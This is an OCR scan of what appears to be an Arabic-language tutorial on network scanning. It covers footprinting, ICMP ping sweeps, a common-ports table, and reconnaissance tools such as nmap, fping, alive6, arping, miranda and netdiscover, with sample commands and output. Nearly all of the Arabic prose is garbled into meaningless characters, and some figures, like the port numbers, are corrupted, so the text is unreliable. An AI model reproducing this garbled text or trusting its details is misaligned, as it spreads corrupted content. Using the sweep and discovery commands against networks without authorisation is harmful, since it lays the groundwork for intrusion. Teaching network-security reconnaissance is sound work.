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I,JA ^^jll CjLg jIslaII L-jjoiai ^Uajll (j^aJaij jVI ^» J^*> tCjLa jlst-<Jl £-<^ J <^3^-^.VI (jl jlkVI ^ 4^^Ld Ijj*.Jjui (JjJjuJ LgjS 

j Anonymous ^j^VI ^ ajj^SI Jj<^ uj^ <IDSj 
^^jII CjU» jIslxJI <L^aL<> Ac L_fl^JI jc ^9 uj-^ 6 (Footprinting)<^j^ * ^t^jjVl .jjj>aj 
^-Ajla ^UijV jl£ cNUi.^i ^ jUr> ^ ^-ijlgil! dj| jiaaJI ^ d^.Ij (ji j^il .(IP) ^-ijjjjVI jjjUc Ac ^ Uj,j] LaLai! CjULiJI d^a JaJjj 
CjU jIslJI ^JLlJzjj^ ajV <jj^aja!3 C5 i£j V j Footprinting IP ^j^V^ dj^j^ jj^ l^j^ 

AjW. ls a±j£ > fl^Jl I^A jc Jjj^atijll AjjLJI a]j*.^<J| ^ AJ jVI dlLa jl*-xJl i>i& ^hVlml dJ .c fl>jfrli jc Ja^S A_J jVI 

CjI jja c fll un^l Sj^aJl .(scanning) o^^^l a^I j.jc j AjUil S^ix^ ^^Ualojl djLuij ^jj^IuAj l-a^I J jj*. AjaLia] Jjj^alij* £aj> 

(Jjia (^Ic JjJ*-Il cil^ aJ tQ^a ft]t A-1j*.j>» ^ _<l^ajll3 S,Jjix» ^ c _^Jill till} £fJJj ^^j^oluiASi j-G jjAxJI jc l_jj*JI ^ ;1^>UlJjujV jL^ajVl 
^ajflj L_jLg,JJ*JI Lg 4<Jjxjuij3I ^UaJ jx* A^Aa^LujJ La Jl* 6L_fl^Jl ^aUaj ^jc .lij-a^ L_flLau£l Uiajl cdj^QJ _c V^lm^l ^Uaill ^L^IiaV Aill^xi 

.^V( 1^. a£jJo3I ^^Jc web traffic j' jj^V^ ^j^^ ^j' j ^j^V^ cJ^ 3 ^^ ^ j ^ 

A_LiJl A^JajVI 



[TYPE OF SCANNING] o«il» e 1 ^ 1 

diU^kJI j cjIjjjJI ^^i^j Port scanning -1 
IP jjjU^ j-a^i ^^l-j Network scanning -2 
> ^ 1 ialij o- 3 ^ Vulnerability scanning -3 



U» o^lc jillj jjVI (jc t^i-v jj ^ill o^ 3 ^^ (scanning) o^^ill 4jUr. AJajoal <J jll ialij cii^J! ^ iffill ^^jjlaIIj 

^UaII/lIjIjjjJI jli CjI^JjoJI j jj jJAx^ll A^JajU j-<iVl (3^*^ j Lnjoij l^jll <J jj^ j]| j^joj ( . lJjudJ tilli j J jl<Jl c a« > >i ialaj 

^jjtJ tAja. jji-d CjtjjjJl/iaLLal! c ~ ^ <J ^I^^I/cJ1juJJ-<J1 l(g <OVimj (_^i3l ^Uajll I^J ifll jjll j jjVl AjIIaJ JflxJ 

jiaxJ ^ ,A^lc o^cla AiaLaUJ jA I^A ,^Uaj3l (JJ^tj (j-a ^ J^^^ CjtjjjJl/iaLixJ! jxi JJC j 6L_a»_jJa]! Jalaj ^3^^ 

.Aja. jjLg ial_L<J3 l!^^ .JAslSI j-d jll ^^ic Uij^i UJ^ ^ L_a«jJall ^ jlaui tdiVl^Jl 

a_iLoc ^.UjI .ajjI laJLu^VI CjUi jIslxJI ^a^. ^ jj^VI <J^J^>^ d^.Ij c _^a (Network scanning) A^f^l jjc ^a^ill aA^c 

A-iJJ 4(Jjt.Jij1I A^Jajl tClljjjjyi A£jjoi jjc l^J] jj^ jll j^J ^^jll o^^^xJl IP jjjUc <J j^. CjLd jlxxi ^a^. c*jj£ «qJ tA^JjaJl jjc ^ajaill 
.Aj^jill L^JjJaJl A>Jaj| j CjKjmiII J jj^. ^ > ^ ^-W^^ ^^>J 4 ^ C5^j Ai^V^ ■ ^ C5^^ ^l^^Jl J ^Uajll 




Sends TCP 
/IP probes 



Gets network 
information 



r 



e 




Network 
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(OBJECTIVE OF NETWORK SCANNING)*^! u**i ^ <> 




<Jjou3U jj£I <J-*aj3 tilt-iA tL^^Jl 3 aialall J ja. dlLa ^ *J£^ 
(_)a.l (j-a t^UlUj 6(j^a jj^aJl 4a. j Jc 4 alalaH cillj J dll jsull j L_kxjJa3l Jalfij 4ijx-oJ till 

^a.1 g all ja^Jl qjI <Jj3 3 > <al ail <jL^j*Vl 4£jjui 4j J^*-^ (J 

4_lLaC (j-o. ^ alia a ^1 jjl S-l J^-] (j^J^ 3 (jC- Ailla-xi jiaJ ( " llg a j L_fl^Jl 4£jjui lU^J -^^^ 
^juiaII <jjaC J^-a. IfljjjLaJ (JJJLJJ dlLo. jlstxJl ^ jjj ^aaill 4_iLaC S-l J^-j .^iUaluaVI 

_<l^alja3l jJaj 4-^a.j Jc UK bUuel Axusu 

Ua ^ j^ati 4_jLc; ^bV L-itaAVl c>» ^jAxJI i^IUa jjfL ^ 

'IP u^j^ 6 (live hosts)^Jl u ^-^ lJL£&I ■ 
AjaJt j jqj^N (open ports) ^a. jjaJI iaUxJI j 

.A£jJd3l Jc <Jaxj 

(Jjia ,JaJ ^jl cilj£ aj .4£jJo3I jl ^Uaill J Ia jju£3 4-Sj^J L^-^ <^ ^ J-*^^ iaU-all \ (opeil pOrts)^- j^Ji iallxJl i al nn^l ■ 

\ $%L±ui Jc 4_a. jjLoJl ialLoJl t 'at .*1<l ^ t a^U 4_xJaioJl <£jJj Jjo£3 AI^joj 

(jiUaj J a^juj a\\ LiA .FOOtprintillg <J) ^-^> ^ > V^luirtH ^Uajll ^£ ^Uajll 4_A?J c fll un^l ■ 

.(JjxjujjS I ^UaJ J L_a*_jJa3l Jallj (JjjLujI Jc ^ * ^ 
jl ^Uaj (jja. .^Uaj ^1 ^^ic <jAlj3l jiaLa-xJl djI^J^illj dil^sull J J^-J ! C — J ^'^^^J t * a,> 1 u ^ Jalij ^J*laJ ■ 



(PORTS) ^UijjjJt/jalU]! 

. jUaljVI 4-aLaJ) ^JjJ (J\_x^aj!>U ^ajujJ j CjS j S^AxIg iaLLd ^1^1 ml _L_j| jaJl 



Port Number Service 


20 


FTP data transfer 


21 


FTP control 


22 


SSH 


23 


Telnet 


25 


SMTP (e-mail) 


53 


DNS 


80 


HTTP 


137-139 


NetBIOS 


443 


HTTPS 


445 


SMB 


1433 


MSSQL 


3306 


MySQL 


33S9 


RDP 


5800 


VNCover HTTP 


5900 


VNC 



^ ^jAslSI t^lliA .C1uj£ tiL (j-aLaJl jj jJf^l j^J> ^ J^^^ ic^-^ <JJj^j3I ^ ^jixJl (j-o. (jj^J 

jA (jJ jJJjq£J|) <JjLa3! A alia ^1 (jjIaSl ^j-d J£ .C-Uili ci^-^ (J 1 ^^ ^ clA^ Aill^oJl ^jjlall 

^ jla. j <Ja.b ^j-d ^.1 jjoj ^-LgjuJI CjULijII (J^^jj ^ajujJ 6 jj jjxq£ . JJJ^^ l!^ 

^jjjUII 6^jUa.VI (J^asu j^ll L-jLj (Jjjia (jc I jla..JJ <JjL<Jl L-jLaj^a) <jl£ ttilli ^ j -c ^UiVl 

J j^.^ 4jjj£ ^jc. jiajll (J^asu .SiaU J^la. ^ ^- u iJJ ^3 (_^^jlaj jjc. ^j^aajai -c>5 ilaJl ^jlJl JjL<Jl ci^-^ 
^^A iaLLal! ^ji j^il .ialj-Jl j jj jJJ^all S j^-a.1 <jjjoij3I liA ^ ^ja. cJ^^ (3^J^ ^-S^VI oiA tcilljLd 
dAiUJl (Ja^J (j-<i JJJ^^ L5 HjJ j lc jJjoi jj£I ialixJl (J^asu .ciL ^alaJl jj jJJxal) jt$a. CjIjUslSI (Jj-q 
.(jjoijII <Jjfj (j-<») ^ laJLujJ Ij^Uj Lja jaC. Ia jj^I J^-Vl (jiaxJlj t((iL ^alaJ! ^^UiVI c_ jLj^I <J!Lq LgLoj) 

(jjyia.1 ^ a\\ \ Jjoij-o laxJ (jl (j£-<»Jj A-Lojljill ialixJl ^jl Jc (Jasu A£jlauJl A£jjoJI diUi^a. £yz ^jAslSI 
.IgJ <LILJI CjU^aJlj A£jlui<\]| iaUxJb 5^jII JjILJI Jj^aJl ^a^Jj .^-fl^Jl ^Usull 3ijJa jj 
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4£jjaJU iaiijii <^iJI *J$^^I j jfi jjj^^ ^J&-^ J ji*^ ^-^^ jA Scanning 4i^.j-a]l ^ (^jan^ll jj£jJI 

Jalij 4(^11 4 FTP 'SMTP ^ILjkS) ia:>LJI iabJI cjU^JI t Jji ^Uaj <(3KyU1 ^ j^JI jl ^yMI jl^ 

.<Lala all 

ttilli _4itia^l! cjI jjVl c> Scanning 4i^>JI ^jj ."<jjj£3! jUull" ^ jiuuJt li* 1^ L^Jall Jatij jLii U L3l£ 

ftiA ^ c_fl^!l .Nessusj <Hping <Nmap ^ J ^ ji&VI j s ji&VI Cj\ j^VI o«j C5 ic Jj^aill 11a j£ jj 
.JljlkVI jb^J fiU^J! Sjjj ^ <LLJI 41^^13 t^l^VI iojta JjSj 



(CHECKING FOR LIVE SYSTEMS -ICMP SCANNING) Jjw 6- J*^' 3.2 



j .^yu-svi jii^ ^Lu.Vl cj^jSjjjjJI jJ > ICMP (Internet Control Message Protocol) JAs^ 1 

^jl jl i^lUa jjc. <La,lk t . ilia |til3i Jc JHa£j ;^Ua^.VI JjLujj JLoijV 4j£jjoi3I L-ll> ul j^Jl J JjIxjuliII 4 JaJl Jjfi (j-a a ^LujJ 

V * axj <jj U£ 4 W ^i 21 IP J 1 ICMP Jl uj . J^VI o^j V router <^ j*ll J Host Ullj^I jjSj 

JLalait j JLujj] J JaxIoij V j$i tilli j UDP j TCP J^ J^ JJJ lP 3 ^*^ J c '^'^J J -IP J^ c> ' 

.traceroute Ping Jl 
ICMP SCANNING 

IC1VIP J^jj (jy^ 3 U^ 0 ^ " ^aUaj J <J^lla>Jl CjL<» jIslxJI 

^.iJaj J ^1) ^U^l Jjau U^l ^ q*\ ^j^j J 1>±£a obVl .^Uaill tSlli Jl 

.Ping sbVl ^l^l^l (jjjia tdli 4£jJJI J (JaxJI 

[-L] jb^Jl J-a (5 jljJU ping J*Vt ICMP J^^ J *^Uj ^ ^auju^ c jLaJ 



ICMP QUERY 

l^a jjSj ^ill iiia jl! AikLaJI Ai ^a ^1) ^llii J^ c^jll <i l^l:i^lJ ^j^aj c>Ajjj sbl ^ ICMPush j> ICMPquery 
L 3J> jc^^ cXnetmask) <^ ^ .(TIMESTAMP) 13 ^ c> ICMP JL-J ^> c> (e 11 ^ 1 
p >ol3 ^^1 AiUnJ netmask c> jj^^ ^ .(ADDRESS MARK REQUEST) 17 ^ c> ICMP ^ j Jl- jj 
^j-oll (j^-oja ^subnet) djl^jJJI ^jc CjLa jbu* Ls lc J j> ga^JI Asu .^1 jaJLujVI (subnet) '^-p CjI^jJoII jua^j 

.broadcast address m inx^ ja lJI^IojI 
.(command line) jVl ^l^ki^U J^\£3U icmp ^ J ^^ki^ sbVl ^ 

: JU JjLiU) ? Uaj ^ 
; VLo^j ^ SbVl aiA 



#apt-get©install©icmpush 




icmpush -h 
Usage: icmpush type [options] host 

ype: 

-du Destination Unreach -echo Echo Request 

-info Information Request -mask Address Mask Request 

-rta Router Advertisement -rts Router Solicitation 

-red Redirect -sq Source Quench 

-tstamp Timestamp -tx Time Exceeded 
-pa ram Parameter Problem 

-v Verbose mode on -vv Debug mode on 

-h This help screen -V Program version 
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.(netmask) ^j*lt £A£*iII iijaJ -mask jLpJtj Jaj 2 * jUaUl -tstamp j^pJt 

PING SCANNING OUTPUT USING NMAP 
http://nmap.org 

a) sbVI *>i& J>ikluAj .host discovery * 'Ping ^Aj~* *Ij^V Ig^b^ nnl J^ sbYl j& Nmap 

t^ICMP echo request jj e£J^ Ping o«ai &2 sbVl ^ .4£±£dl Jc lUJI J jj^jxll (j jqj » ^ l 

j-a ^J^i3 .Ilia (j-a^ill b* . ICMP ECHO^J (-UjJ t^jjJaJl jli <(ti^) JaxJI £_jJa j J c \u>ia\\ <jl£ bj .a£jj^3I Jc Jjqj^^l 

.AjU^ jl^ J!lk (j» ICMP ^ J ftj^Vl 



PING&PING SWAP 

jjjL ^ pi n g .internet Control Message Protocol (ICMP) JL^VI ^ <> j^U ^jj Ping 
[64 byte] £jb uj^j ICMP echo request ^ cs^j 6 (network traffic) £AjI#1I Jto c> £jj Jt^jj 
jl*aJI jl£ bj jl^ j! jjj^ Jc 4 [56 data bytes and 8 bytes of header information] 

tAjL<LaJ! jl^a. 6 ^ <jL^jjojV1 aJc lc jl<ui (JjjJ j <Jjaju£JI ^jja j J Ping ^O^- ^— ^ Jll (Aia^JI 4£jJoll ASLkjj) 

JjSj ( Ja»JI J J) oUaJI ^jS Jc ( Lijja^l l jl U j^kj b* j .echo reply ^ yr^^ J) J' J^jd 

Jj jLaJ! Jj j^JI Ai^ilojl ^ill dja jll JL^j J Llj 3 ajill CjL» JslxJI ^ <c j-o^ Uiajl j^jj Pings ^tiAjLull 

ping lS^*-^ .a£^juJ1 JL^ajl <LS jj (JjjUsJ Ig^bviml (j£-aj Jll j tgil^aa Jill cjULuII (jc I jjj^j Uiajl Jasu Pings j*ll j <— i^JI 
: JVI j*J\ jl^»jj Jj^jll J command prompt jt J J^Jit f ^ 6 jj^j j' 4? o- 3 ^ JU^' c> 



ping©target_ip 



djIjI^aVI ^-i^ J>iJjj .l^ilc ping ^-bl J j^-^ jll 5J^U c fljjja^ll ^joj! jl J*i3l IP q\ j^c Jl "target ip" Jl^f^l Jj ^^i^i ^ jjuj 
£jjl lU^j^ ^— * jj^j ping ^>°VI tUjjal jiial ^jl jj^jjjj (jn^nl 4 ^ uoj ^jjj cj^ll .ping ^*^l jj^jj 4jj,iaJI 
.ciSjill J^ 6J U^j ^ j^ echo request J^j] c> J ping j-^Vl j^iuo^ J tUUti Ajl^jj ^ echo request ^ 
(J-ftc a jffi J^ ^^>*^ ^ .Ctrl + C ^b^i> uLj 6 jij ^_>^^ cJ^jj ^—^j^ ping ^>^^l J*^- ^^^j 6 u >i ^\^ 

.(Footprinting) JlSlI c_jU3I J UjL. 

Ping .<jj^aljill obi Ia jLiicU sbVI 6^ ^ S^UIujVI 1 ^ ^ U jc^ ^ping ^Vl J-^ ^^^l 4^ u*^^ 

tt^juj^l! .cAijJaxJl c fll un^l <xi^k£ Ping *^bl ^l^klojl \ a) (SUaJ) Jc c LijJaxll ^jl£ bj La •lilaJ J SJjLq (jj^J (jl (j^uJl (j-d 

jll cjIj^VI (j-a Ai^aJI tilLiA tU3 <jjau3U ia^J! (jjoi^J .Ajliil <!Ui jjc. Sjjxj^a J Ljj^ ^ <!l J^l ping j-°VI ^q"^ (jli 

.Ping swap <^'j^V ^ 



J5I ping >aVI ijajj (> s jUc Ping swap 

J j^.^31 V^J 6 IP (JJjUc (j-d <C ^ Jj UjlUj I^JL u jj ^JJ 

.ping j-°VI ^ ^-j^j ^ <— i^JI jl Jil c5^j^ cJ^j 
ICMP echo f c> ^ c> uj^ Ping swap tij 
J (hosts) u A 1 > ?n ^ c> Jl WSl^jl request 

,^.lj djSj 

aIia J ^ jU ^jL t (alive host)-^ ^ qj^^ l jl£ bj 
u£ c> > Ping swap .ICMP ECHO Reply 

<^ dbVl ^jjjJ ^ .A£jjoJI (j^a^il (jja Uajj j ^^Sl 

^ia^. Jc j-qj JlLd L-flj > *aJJj tUjjflJ l^J£ Cl ll > ^\')a\\ 

j-oVI ^^UIujI S-n?J JaxJI J (5 ill ^Uaill & JajVl 

,^kl ^Uaj ^Jajajl ^JLoajj ^aJJ (^^1 ping 
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ping 3 j\<mh A^ ^ j I^qIa^LujLj ^jII j jjjjuJI j^udj <L^Ho ping swap ^ c^Ua .ping swap ^ ^l-vVimlj 
u A > ^^ t i> ^ ICMP ECHO request^W^ jj <jjji> j& u jqj > ^ l c*JJ cjI jjVl fti* .<J swap 

.li^V ^jj l_a jjoj c ^j3I j nmap ^£11 fti& cJa*j ^ j£i c _^j3I cj! j^VI j j 



ANGRY IP SCANNER 



O IP Range - Angry IP Scanner 



Ftle Goto Commands Favorites Tools Help 
IP Range 66249.93.1 to 66249.93.255 

Hostname m-fl04.google.com [ +B> [ Netmask 



IP Range 



Ping TTL Hostname Ports [4 ♦) 

^66.249.93.73 38 ms 246 ug-in-f73.googlecom (n/a] 



& 66 249.93.74 



♦ 66 .24953.75 
#66.249.93.76 
©6624933.77 
©66.24953.78 
©6624953.79 
#662495330 
©662495331 
©662495332 
©662495333 
©662495334 
©662495335 
#662495336 



50 ms 246 uq-in-f74.qooqle.com |n a] 



43 ms 

43 ms 
36 ms 
52 ms 
41 ms 
[n7«J 

44 ms 
46 ms 
50 ms 
41 ms 
43 ms 
In a] 



245 
245 
246 
246 
ln/s] 
245 
245 
246 
246 
245 
Jn/sj 



Ready 



ugin-f75google.com 
ug-in-f76.google.com 
ug-in-f77.googk.com 
ug-in-f78.google.com 80.443 
ug-in-f79.google.com 80.443 
[n/s] 

ug-m-f81.google.com 
ug-mf82.google.com 
ug-in-f83.google.com 
ug-in-f84.google.com 
ug-m-f85.google.com 
__jn/«|_ 
Display All Threads: 0 



In/.] 
In/a] 
443 



(n/s) 

80.443 

80.443 

80.443 

80.443 

80.443 

[n/s] 



http ://angryip.org : j^Jl 
.[IP Scanner Tools] IP o^ai Sbl j& Angry IP Scanner 
ia\_L<JI ^aaijj t Jjj^aliiilU c Luia^H ^jujI ci^Hj 6 dead node 

4* hit ^ Jaxj ftbVl ftiA .iaUJI/CjljjjJI c*Ui£j IP (jJjUc 

.255.255.255.255 1.1.1.1 c> »^ IP 



THE SOLARWINDS ENGINEER S TOOLSET 
http ://www.soIarwinds.com 

b& CjIj^I ^l^kiujU (> cjIjjVi c> cf- * J-^- yr* The Solarwinds Engineer's Toolset 

<^jj /ftj^. <^ ^^iil IP (jjjUc j UIIa aIa^LujVI ^jS ^^jI! IP ^jjjUc Jc l-a^xjII cfi^j IP l^j^ l3^-^ ^ 

-C;r ^ DNS ^4 



ADVANCED IP SCANNER 
http://www.advanced-ip-scanner.com : j^-a^ll 

(Jjtij l^-Ija uill j ia^a jjAlij JjixjaLill A Jc (Jasu j l^J 

.l^ic 6^)A3LxJl Jc iaxjJal! (Jj^la (jC 1 \jt ujJJ jlj ^aJ Ajtg-J! ^** 1 JJ^^ ^J^^J (j^aLkll wizard ^ (S'lX^J ^ ■ 
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Advanced IP Scanner 



File Actions Settings View Help 

II ■ 



\m\— 



Like us on 
Face boo k 



192.16S.13&.1 - T92.16S.13S.2 54.. 192.168.16.1 - 192. 1 6S.1 6.254, 192.16S.50.1 - 1 9-2.1 6S.50.254) 



Favorites 



1 



Status 



Name 



IP 



Man uf a ctu rer 



MAC addi 



0 alive, 0 dead, 0 unknown 



I^Vl^ lala Scan 1 u<< ^5 l^ja c_ l^oli asjj ^^jll 4£jJo3I JjUaj <jLkI! ^ £jJaj 



Advanced IP Scanner 



File Actions Settings View Help 



■ I 



ip c toj 



Like 'us on 
Facebook 



192.16S.16.ZO - 192.168.16.90- 



Favorites 



Man uf a ctu rer 



MAC addre:: 



■> he: 



JANA-TEBA 



1 92. 1 63. 1 6.70 



COM PAL INFORMATION (.. 



00:1 E:EC:AF:FB:65 



SAMA 

192.1 6S. 16.73 



192.1 &S.1 6.72 
192.1 &S. 16.73 



Hewlett Packard 
VMware, Inc. 



74:46: AQ:S7:BC:5B 
00:0C:Z9:0D:A3:A4 



3 alive.. 0 dead, 1-S unknown 



wake-on-lan ^ <— * ^-i^jall ip ^jjjUc ^^ic ^ jLoll o-^VI j jib Jai^jall Aic 

.Abort shutdownj shutdownj 
.NetBIOS cjUjL^j MAC j ^»VI j IP j' W^3I <> <i ^ ^ 

A \y* ujJ S^lc] jl 4_i^jJa3l jl^a. (jp^-l 



<^t£ flltf FPING 

<jt fib! Ljajl (j^-AJ . Jt-Lajiil! \$\\* uii ^jjj <^-£ ^ FPing ^ .FPing is**** stai ping swap l!^*-^ ^^A 3 

;^U3I j^VI j (Terminal) ^ FPing J^-^ <J$^' .Windows J ^ - ^ SI ^Uajl t ^vi 



#fping©-a©-g©172.16.45.1 172.16.45.254>hosts.txt 



i^jj j jjjIj cPW^ ^j^j^ liA j .LkJ ^U3I (live host) *W^VI ujqj>^l jlg-SaV "-a" ^hviml 

liA ^ .IP (jJjUsJ 4_ig-^J ^jl^Jl l>* <-J^ J^j .l^juoai ^jjj ^1 IP (jJjUc; ^ (jUaj b^aal "-g" ^1 ikU .6*ljSJt 

4L_aL ^ j gSUlt ^ jd ">" j^JI ^^1^ .172.16.45.254 ^172.16.45.1 <> IP ^ 'J 1 ^' 
."cat" j*VI ^l^klujl j) oajll jj^j <^ Lai <hosts.txt lP 3 ^ ^jLuII l^LJI ^j^j] "hosts.txt" ^l^i^l 

.{catOhosts.txt} 4? JL^j^l <J Jtill j*Vl lM 'hosts.txt cjLj^ 



https://www.facebook.com/tibea2004 



.(man©fping) ^ man 

cj^jj ^1 4i^lauJI Sj^VI ojUij] ^ill hosts.txt ^-al^ ^ «j 4 f ping J^-^j p-I^VI ^j^j 

< * a j - b o (jaJ <j| j^ilj (jl ^ &1I (j-a <^-^j ^ sj/°^ ^ l^i^Loaj ^^jl! 4^jla ^jjlixJI £>3& l al - ^ ^j! ^, .fping ,>*VI <^£i3 
.ping cs - ^ ( ♦ ^ * ping c3^** j^'^^ A ^ 6 ping ^ < . u^Lujj l_a jjuj 

Colasoft Ping Tool available at http ://www.colasof t.com 

Visual Ping Tester - Standard available at http ://www.pingtester.net 

Ping Scanner Pro available at http://www.digilextechnologies.com 

Ultra Ping Pro available at http ://ultraping. webs.com 

Pinglnfoview available at http ://www.nirsof t.net 

PacketTrap MSP available at http ://www.packettrap.com 

Ping Sweep available at http ://www. whatsupgold.com 

Network Ping available at http ://www.greenline-sof t.com 

Ping Monitor available at http ://www.niliand.com 

Pinkie available at http ://www.ipup time.net 

U j£i *J ^1 CjIj^VI J I 4iLjaVlj (live hOSt) u ^ L t5 HS Jjij&lll J laL ^aUJl CjIj^V) Lpasu ^jj 

;<JU3I ^Ajlill diaJj ^ j^jj c ^j3I j ILL* 

Application -> Information Gathering -> Live Host Identification 

alive6 - arping - cdpsnarf - detect-new-ip-6 - detect_sniffer - dmitry - dnmap-client - dnmap-server - 
hping3 - inverse_lookup6 - Miranda - neat - netdiscover - passive_discovery6 - thcping6 - wol-e - 
xprobe2 



alive6 ■ 

^ j <JL±\ c*\ j±xu J oj± JU^ jsll ^ yj\ J^L THC-IPV6- ATTACK-TOOLKIT &\ c> *W j* 



ta : ~# alive6 






alive6 v2 . 0 ( c ) 2012 by van Hauser / THC <vh@thc .org> www.thc.org 






Synta 


x: alivs6 [-1 srcip6] [ -i file] [ -o file] [ -DM] [ -p] [ -F] [ -e 


opt ] [ -s 


po rt 




[-a port,..] [ -u port,..] [ -W TIME] [ -dl rvS] interface [ unicast -o r-mul 


t icas 


t-address [ remote - rout e r] ] 






Shows 


alive addresses in the segment. If you specify a remote rout 


er, the 




packs 


ts are sent with a routing header prefixed by fragmentation 






Optio 


ns : 






-i 


file check systems from input file 






-o 


file write results to output file 






- M 


enumerate hardware addresses (MAC) from input address 


es (slow! 


) 


-D 


enumerate DHCP address space from input addresses 






-P 


send a ping packet for alive check (default) 






-e 


dst,hop send an errornous packets: destination (default), hop 


-by -hop 




-s 


port, port, . . TCP-SYN packet to ports for alive check 






-a 


port, port, . . TCP-ACK packet to ports for alive check 






-u 


port, port, . . UDP packet to ports for alive check 






-d 


DNS resolve alive ipv6 addresses 






-n 


number how often to send each packet (default: local 1, remo 


te 2) 




-W 


time time in ms to wait after sending a packet (default: 1 


) 




-s 


slow mode, get best router for each remote target or 


when prox 


y-NA 


-I 


s rcip6 use the specified IPv6 address as source 






-1 


use link -local address instead of global address 






- V 


verbose (twice: detailed information, thrice: dumping 


all pack 


ets) 



Asu (jc 4.1^. jl^a. du3 131 .IPv6 U^J^ C ' (^5^ ^ L)£^ ls* ^A^Lolj SbVl £>3& 

.(routing header prefixed by fragmentation) ^j^t u^'j J^jj ^ '(Remote router) 
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I^VIS tSUij ICMP6 Jl^jl ^ ^l^klaal Lia^j U jSl 



# alive6 still 

Warning: unprefered IF"v6 address had to be selected 
Alive : fe-EO : : 2Qc: 29ff : fe97 : 320f 
Found 1 system alive 

arping ■ 

t^jj* J*" JI>JI ^ j ICMP request t> e> J cU* 2 Ping sbVl JjS <> L j£i L£ 

Jl qc* diaali ^£ ^^kiaa-a J j£ jj jjj) ARP ^ J^j^ j ping staVI J^c (jjaib f jij arping sbVI j ^ I J-**-^ 

jjjL ^ tsUij pi n g A^j^ L> Sc (IP Address J cf 4^WI 4£±^l ^ s^j^ll s j^bU MAC Address 

, jAx-£3^11 JP (jl JJC 

(jl jJC (j^^ia (jC Lai J^-a (jj^J (hOSt) t fl^a^all .£tjU3l <j!a^>xJ ^jli ^aJ ^ ^ rail L_flJjJaxJl ^1 ARP cJ^J^ arping S^cLolaII SbVI 

.<j qA±\\ MAC u'j^ j 1 ^ IP 



: ~# arping -c 4 1 


92 . 168 


. 16 


7 3 












ARPING 192.168.16.70 


















6G bytes from 00 : le : ec : af : 


fb :65 


( 192 


168 . 


16 


.70) 


index=0 time 


=40 .039 


usee 


60 bytes f rom 00 : le : ec : af : 


fb:65 


(192 


168. 


16 


.70) 


index=l time 


=17.070 


usee 


60 bytes f rom 00 : le : ec : af : 


fb :65 


{ 192 


168 . 


16 


.70) 


index=2 time 


=17 .070 


usee 


60 bytes f rom 00 : le : ec : af : 


fb:65 


[192 


168. 


16 


.70) 


index=3 time 


=16.946 


usee 


192.168.16.70 statist! 


cs 
















4 packets t ransmit t ed , 4 p 


ackets 


received 




0% 


unanswered (O 


ext ra) 




= -* 1 



















^ jill (j-a ^3^ 4 JLujjI ^ ^^Ij 4 I <*.v^ml UjI ^jla^)il3j IgJLuijI ^jjj ^^jII ^3^ L£^J ["C] JJJ**^ ^ LaAalLujI 

.l^la JLujjVI fJJ ^jjuj ^1 .nil CjjIS ^j^i3 -J jLrkJl Liajl ^^klaij .ARP 

aJl 4^uJl ^ J^u Jj£ jj JJ^I 1-^ I^Ua j^a 

detect-new-ip-6 ■ 

.U^aJI *£*51l J\ 4^iaJI ^Jl IPv6 ojj^ (> ^-LSSil THC-IPV6-ATTACK-TOOLKIT ^» c> *W 



: # detect 


-new-ip6 


eth© 




Started ICMP6 DAD d^ 


stection 


( P ress Cont rol -C 


: to end) . . . 



detect_sniffer6 ■ 

*1 I i] ci^] ^k-M LAN ^J* f U»3ll j& J THC-IPV6-ATTACK-TOOLKIT o» »^ 

Ij^L c ^j3I j t^^i^-all JabjjVI (jl J^C ^1,^ nnl ^aJJ q V^l ^.A^J ^aJJ ^3 lil .BSD (J^^ ^aUaj 4(Jj>£ jjJ i jj^JJj ^-a lU*^ .V ^al Sniffing 

.Jaxj ^ I^LujJ La 



: # deteet_snif fer6 ethO 
Sending sniffer detection packets to ff02::l 
No packets received, no vulnerable system seems to b 



e sniffing 



inverse_lookup6 ■ 

J^^i] t (inverse address query)c>-j^ u'j^ e^ 3 ^ 1 ^ THC-IPV6-ATTACK-TOOLKIT <> ^1^1 ^ 

. jVI £ jJ^a j^ll liA g-jll ^LJajVl c> .MAC ^ VJ T " ^ C5^^ IPv6 L^J^ 



#inverse_lookup6©interface©mac-address 



miranda ■ 

jlj^JI dj^j lil) lJ^JI ^jJt o-a^il UPnP (universal plug and play) Jj^jjj ^^i^ ^1 sbVl ^ Miranda 
Ai^stxi ciL^ uj^ ( ; miranda ^ cJ-^^ cJ^ _4_i^jai3 <jjajc l^jli <J j^j^>^^ ^ (JjjuuHj ^ jiii ^^Irouter L * ^ ? ^-^^j "Su^ 

UPnP m 

AiikJI jjjU^I <> <c ^ '(UPnP IjL^l) i (Universal Plug and Play i^j^VW) cr^^t J^i^tj v^J^' ^ J 

^^Ic ^j;Lj\ UPnP -Jl ^aj^a .6^Llx-aJl jLaC-VI jl^jV Aj£Luj!^J1 J^laJl <£jjai ^J-ajJa jl L£Ljj l^jJaxJ ^-a ^jLaS^)!! 6^^.VI J^^J (JjS ' ^ 
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<£jLabGj l_lujL^JIj jlitill Jl iajj UPnP -J I cJ^-^ cjVI j^JI . jlitill s^&^j ^-^^^j ( > s^-^Jj cjVI j^JI 

.Wi-Fi -J I U^LujV (la^j j^ll j jj^iiill djlaLd j jjj^alt£) I^jUjI^ 

^ l5^'j interactive mode <J*-^ (terminal) J miranda aJ& Jjji* <>- sbVl ^ J;!^ ^ 

(upnp>) 




i^VtS upnp S a-^J^ iaU* ^Haj (device) SjgV^I £^ t*Ui j msearch j^*^ 



u p n p > msearch 
Entering discovery mode for 1 upnp : rootdevice 



to st op . . . 



:ont ent =u 



SSDP reply message from 192.168.16.70:2869 

XML file is located at ht t p : //192 . 168 . 16 . 70 : 2869/upnphost /udhisapi .dll 
uid : 16cb31f6-3c07-446f -a847-9e94f f7bbecc 

Device is running Mic rosoft -Windows/6 . 3 UFnP/l.O UPnP -Device -Host /l . © 



U. SERVER UPnPj * J j^JI £jh * Jj£ jjJI Ji« t> jkJI <> jjKII 4^ host info 0 ja«2JI 

.c_fl^JI jo CjUjkJI 2 r x^J ^ v^ .. n host get 0 
.host get 0 <^bl axj lJ^JI Jj^iau CjUjkJU <^IS Host summary 0 

netdiscover ■ 

<ii c*Ui ^ ^ jll Jc 'DHCP ^ V ^jII cjKi>ffl LJjJ rv>>hj AliiiSi CjIj^I ohl y> Netdiscover 

XP jl jo <c.jjudj djLd jlx-a j Ul ^ajujj StaVI oiA .^>3l j ARP J^j^ .Aj^LuJI cjI^jjuJI l-aLou^I Jc Uiajl J-^s 

.DHCP fil* c?t UtJ^ cr^ ^£1^1 CjKi.nlt J l^jli ULL. UB U£j <^ Jc 



ia : ~# netdiscover -help 
Netdiscover 6 . 3 -beta7 [Active/passive arp reconnaissance tool] 
